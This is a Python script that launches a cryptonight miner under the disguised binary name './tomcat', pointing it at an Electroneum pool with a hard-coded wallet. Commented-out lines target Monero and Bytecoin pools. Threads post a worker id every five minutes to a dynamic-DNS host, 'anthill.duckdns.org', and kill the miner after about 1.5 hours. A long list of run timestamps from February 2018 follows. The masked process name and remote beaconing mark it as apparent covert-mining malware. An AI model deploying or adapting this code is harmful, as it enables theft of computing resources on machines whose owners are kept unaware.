import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:41:03.501634
#2018-02-17 16:28:05.419742
#2018-02-17 18:14:04.303832
#2018-02-17 20:02:07.346736
#2018-02-17 21:50:08.585380
#2018-02-17 23:34:03.723546
#2018-02-18 01:22:05.443568
#2018-02-18 03:09:03.614455
#2018-02-18 04:58:03.941445
#2018-02-18 06:52:01.568324
#2018-02-18 08:40:08.783135
#2018-02-18 10:26:03.827231
#2018-02-18 12:11:07.838378
#2018-02-18 13:57:01.240488
#2018-02-18 15:47:03.912934
#2018-02-18 17:38:07.109353
#2018-02-18 19:26:02.063559
#2018-02-18 21:11:05.305163
#2018-02-18 22:58:01.256612
#2018-02-19 00:45:08.366837
#2018-02-19 02:32:05.883168
#2018-02-19 04:18:04.809865
#2018-02-19 06:03:05.443823
#2018-02-19 07:51:06.303449
#2018-02-19 09:41:07.361877
#2018-02-19 11:32:06.615734
#2018-02-19 13:19:06.722770
#2018-02-19 15:06:01.306644
#2018-02-19 16:55:10.725127
#2018-02-19 18:43:07.306746
#2018-02-19 20:31:06.088441
#2018-02-19 22:18:07.651826
#2018-02-20 00:05:01.613066
#2018-02-20 01:51:07.485792
#2018-02-20 03:41:03.914992
#2018-02-20 05:26:01.841067
#2018-02-20 07:10:08.583407
#2018-02-20 08:56:06.508922
#2018-02-20 10:40:10.190609
#2018-02-20 12:26:08.332748
#2018-02-20 14:12:08.442685
#2018-02-20 15:56:05.762799
#2018-02-20 17:45:07.613594
#2018-02-20 19:37:07.897561
#2018-02-20 21:24:07.638267
#2018-02-20 23:09:05.155728
#2018-02-21 00:52:03.812141
#2018-02-21 02:38:06.149170
#2018-02-21 04:26:07.754458
#2018-02-21 06:14:08.463181
#2018-02-21 08:00:11.605129
#2018-02-21 09:47:03.628322
#2018-02-21 11:35:10.021250
#2018-02-21 13:25:08.921825
#2018-02-21 15:10:09.002457
#2018-02-21 17:01:01.328234
#2018-02-21 18:48:08.539672
#2018-02-21 20:34:04.254904
#2018-02-21 22:19:02.238984
#2018-02-22 00:08:07.798717
#2018-02-22 01:57:05.537763
#2018-02-22 03:44:04.066804
#2018-02-22 05:30:09.519121
#2018-02-22 07:15:07.690013
#2018-02-22 09:02:01.473774
#2018-02-22 10:49:07.948426
#2018-02-22 12:35:04.875237
#2018-02-22 14:20:01.806887
#2018-02-22 16:07:08.290089
#2018-02-22 17:55:09.020320
#2018-02-22 19:43:01.494625
#2018-02-22 21:34:07.044085
#2018-02-22 23:21:01.296057
#2018-02-23 01:08:04.421483
#2018-02-23 02:56:05.605061
#2018-02-23 04:43:07.476051
#2018-02-23 06:28:06.469089
#2018-02-23 08:14:06.240639
#2018-02-23 10:29:07.507165
#2018-02-23 12:22:08.116538
#2018-02-23 14:12:07.680982
#2018-02-23 16:02:01.652970
#2018-02-23 17:48:07.676376
#2018-02-23 19:34:04.414440
#2018-02-23 21:17:01.672294
#2018-02-23 23:04:06.495501
#2018-02-24 00:52:07.571814
#2018-02-24 02:47:06.161424
#2018-02-24 04:38:07.499740
#2018-02-24 06:22:05.385683
#2018-02-24 08:10:07.328598
#2018-02-24 09:56:03.673757
#2018-02-24 11:51:01.359972
#2018-02-24 13:42:06.124200
#2018-02-24 15:29:03.925272
#2018-02-24 17:23:01.774125
#2018-02-24 19:10:09.244551
#2018-02-24 20:58:07.391575
#2018-02-24 23:26:05.266958
#2018-02-25 03:42:07.503183
#2018-02-25 07:27:06.848635